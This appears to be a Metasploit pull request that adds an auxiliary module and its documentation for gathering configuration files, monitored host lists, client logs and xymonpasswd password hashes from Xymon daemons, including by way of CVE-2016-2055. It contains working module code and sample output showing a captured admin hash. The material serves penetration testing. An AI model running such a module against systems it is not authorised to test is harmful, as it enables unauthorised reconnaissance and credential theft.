### PR TITLE
Add Xymon Daemon Gather Information module

### DIFF
--- a/documentation/modules/auxiliary/gather/xymon_info.md
+++ b/documentation/modules/auxiliary/gather/xymon_info.md
@@ -1,0 +1,49 @@
+## Description
+
+  This module retrieves information from a Xymon daemon service
+  (formerly Hobbit, based on Big Brother), including server
+  configuration information, a list of monitored hosts, and
+  associated client log for each host.
+
+
+## Vulnerable Application
+
+  [Xymon](http://xymon.sourceforge.net/) is a system for monitoring servers and networks.
+
+  ```
+  sudo apt-get install xymon
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use use auxiliary/gather/xymon_info`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should receive server and client host information
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/gather/xymon_info 
+  msf5 auxiliary(gather/xymon_info) > set rhosts 172.16.191.250
+  rhosts => 172.16.191.250
+  msf5 auxiliary(gather/xymon_info) > run
+  [*] Running module against 172.16.191.250
+
+  [*] 172.16.191.250:1984 - Xymon daemon version 4.3.28
+  [*] 172.16.191.250:1984 - Retrieving configuration files ...
+  [+] 172.16.191.250:1984 - xymonserver.cfg (18347 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_136371.txt
+  [+] 172.16.191.250:1984 - hosts.cfg (745 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.hos_647070.txt
+  [*] 172.16.191.250:1984 - Retrieving host list ...
+  [+] 172.16.191.250:1984 - Host info (127 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hostinfo_254799.txt
+  [+] 172.16.191.250:1984 - Found 3 hosts
+  [*] 172.16.191.250:1984 - Retrieving client logs ...
+  [+] 172.16.191.250:1984 - debian-9-6-0-x64-xfce.local client log (87942 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hosts.debi_671716.txt
+  [*] 172.16.191.250:1984 - test-host client log is empty
+  [*] 172.16.191.250:1984 - another-test-host client log is empty
+  [*] Auxiliary module execution completed
+  ```
+

--- a/documentation/modules/auxiliary/gather/xymon_info.md
+++ b/documentation/modules/auxiliary/gather/xymon_info.md
@@ -23,6 +23,10 @@
 
   Refer to http://xymon.sourceforge.net/xymon/help/install.html for more information.
 
+  A Xymon virtual appliance is also available :
+
+  * https://sourceforge.net/projects/xymon/files/Xymon/4.3.10/VM/
+
   To expose the `xymonpasswd` file, add the following line to `/etc/xymon/xymonserver.cfg` :
 
   ```

--- a/documentation/modules/auxiliary/gather/xymon_info.md
+++ b/documentation/modules/auxiliary/gather/xymon_info.md
@@ -5,14 +5,31 @@
   configuration information, a list of monitored hosts, and
   associated client log for each host.
 
+  This module also retrieves usernames and password hashes from
+  the `xymonpasswd` config file from Xymon servers before 4.3.25,
+  which permit download arbitrary config files (CVE-2016-2055),
+  and servers configured with `ALLOWALLCONFIGFILES` enabled.
+
 
 ## Vulnerable Application
 
   [Xymon](http://xymon.sourceforge.net/) is a system for monitoring servers and networks.
 
+  Xymon packages are available in software repositories for various Linux distributions :
+
   ```
   sudo apt-get install xymon
   ```
+
+  Refer to http://xymon.sourceforge.net/xymon/help/install.html for more information.
+
+  To expose the `xymonpasswd` file, add the following line to `/etc/xymon/xymonserver.cfg` :
+
+  ```
+  ALLOWALLCONFIGFILES="TRUE"
+  ```
+
+  And restart the service with : `service xymon restart`.
 
 
 ## Verification Steps
@@ -37,6 +54,8 @@
   [*] 172.16.191.250:1984 - Retrieving configuration files ...
   [+] 172.16.191.250:1984 - xymonserver.cfg (18347 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_136371.txt
   [+] 172.16.191.250:1984 - hosts.cfg (745 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.hos_647070.txt
+  [+] 172.16.191.250:1984 - xymonpasswd (44 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_182226.txt
+  [+] 172.16.191.250:1984 - Credentials: admin : $apr1$axRTeLB1$TFmoeLwRnus.Yhr5fJmc1.
   [*] 172.16.191.250:1984 - Retrieving host list ...
   [+] 172.16.191.250:1984 - Host info (127 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hostinfo_254799.txt
   [+] 172.16.191.250:1984 - Found 3 hosts
@@ -45,5 +64,12 @@
   [*] 172.16.191.250:1984 - test-host client log is empty
   [*] 172.16.191.250:1984 - another-test-host client log is empty
   [*] Auxiliary module execution completed
+  msf5 auxiliary(gather/xymon_info) > creds
+  Credentials
+  ===========
+
+  host            origin          service            public  private                                realm  private_type        JtR Format
+  ----            ------          -------            ------  -------                                -----  ------------        ----------
+  172.16.191.250  172.16.191.250  1984/tcp (xymond)  admin   $apr1$axRTeLB1$TFmoeLwRnus.Yhr5fJmc1.         Nonreplayable hash  md5crypt
   ```
 

--- a/modules/auxiliary/gather/xymon_info.rb
+++ b/modules/auxiliary/gather/xymon_info.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'Xymon Daemon Gather Client Host Information',
+      'Description' => %q{
+        This module retrieves a list of monitored hosts
+        from a Xymon daemon, and retrieves information
+        for each host.
+      },
+      'Author'      => [ 'bcoles' ],
+      'License'     => MSF_LICENSE
+    )
+    register_options [Opt::RPORT(1984)]
+  end
+
+  def xymon_send(cmd)
+    vprint_status "Sending: #{cmd}"
+    connect
+    sock.puts cmd
+    sock.shutdown(1)
+    return sock.get(5)
+  ensure
+    disconnect
+  end
+
+  def run
+    res = xymon_send('ping').to_s
+
+    unless res.starts_with? 'xymond'
+      print_error 'Target is not a Xymon daemon'
+      return
+    end
+
+    version = res.scan(/^xymond ([\d\.]+)/).flatten.first
+
+    unless version
+      print_error 'Could not retrieve Xymon version'
+    end
+
+    print_status "Xymon daemon version #{version}"
+
+    xymond_service = report_service(host: rhost, port: rport, name: 'xymond', proto: 'tcp', info: version)
+
+    res = xymon_send('hostinfo').to_s
+
+    unless res
+      print_error 'Could not retrieve client host list'
+    end
+
+    hosts = res.each_line.map {|line| line.split('|').first}.reject {|host| host.blank?}
+
+    if hosts.empty?
+      print_error 'Found no client hosts'
+      return
+    end
+
+    print_good "Found #{hosts.size} hosts"
+
+    hosts.each do |host|
+      res = xymon_send("clientlog #{host}")
+
+      unless res
+        print_error "Could not retrieve clientlog for #{host}"
+        next
+      end
+
+      path = store_loot(
+        "xymon.hosts.#{host}",
+        'text/plain',
+        target_host,
+        res,
+        nil,
+        "clientlog #{host}",
+        xymond_service
+      )
+      print_status "Loot stored in #{path}"
+    end
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+  rescue Timeout::Error => e
+    print_error(e.message)
+  end
+end

--- a/modules/auxiliary/gather/xymon_info.rb
+++ b/modules/auxiliary/gather/xymon_info.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'metasploit/framework/hashes/identify'
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
@@ -110,7 +112,7 @@ class MetasploitModule < Msf::Auxiliary
             origin_type: :service,
             private_data: hash,
             private_type: :nonreplayable_hash,
-            jtr_format: 'md5crypt',
+            jtr_format: identify_hash(hash),
             username: user
           }.merge(service_data)
 


### PR DESCRIPTION
Add Xymon Daemon Gather Information module.

        This module retrieves information from a Xymon daemon service
        (formerly Hobbit, based on Big Brother), including server
        configuration information, a list of monitored hosts, and
        associated client log for each host.

There's probably not a lot of these services around these days.

Returns a lot of data about the target system(s). As useful, if not more so, than read-only SNMP.

  ```
  msf5 > use auxiliary/gather/xymon_info 
  msf5 auxiliary(gather/xymon_info) > set rhosts 172.16.191.250
  rhosts => 172.16.191.250
  msf5 auxiliary(gather/xymon_info) > run
  [*] Running module against 172.16.191.250
  [*] 172.16.191.250:1984 - Xymon daemon version 4.3.28
  [*] 172.16.191.250:1984 - Retrieving configuration files ...
  [+] 172.16.191.250:1984 - xymonserver.cfg (18347 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.xym_136371.txt
  [+] 172.16.191.250:1984 - hosts.cfg (745 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.config.hos_647070.txt
  [*] 172.16.191.250:1984 - Retrieving host list ...
  [+] 172.16.191.250:1984 - Host info (127 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hostinfo_254799.txt
  [+] 172.16.191.250:1984 - Found 3 hosts
  [*] 172.16.191.250:1984 - Retrieving client logs ...
  [+] 172.16.191.250:1984 - debian-9-6-0-x64-xfce.local client log (87942 bytes) stored in /root/.msf4/loot/20190629235042_default_172.16.191.250_xymon.hosts.debi_671716.txt
  [*] 172.16.191.250:1984 - test-host client log is empty
  [*] 172.16.191.250:1984 - another-test-host client log is empty
  [*] Auxiliary module execution completed
  ```

Depends on #12031 
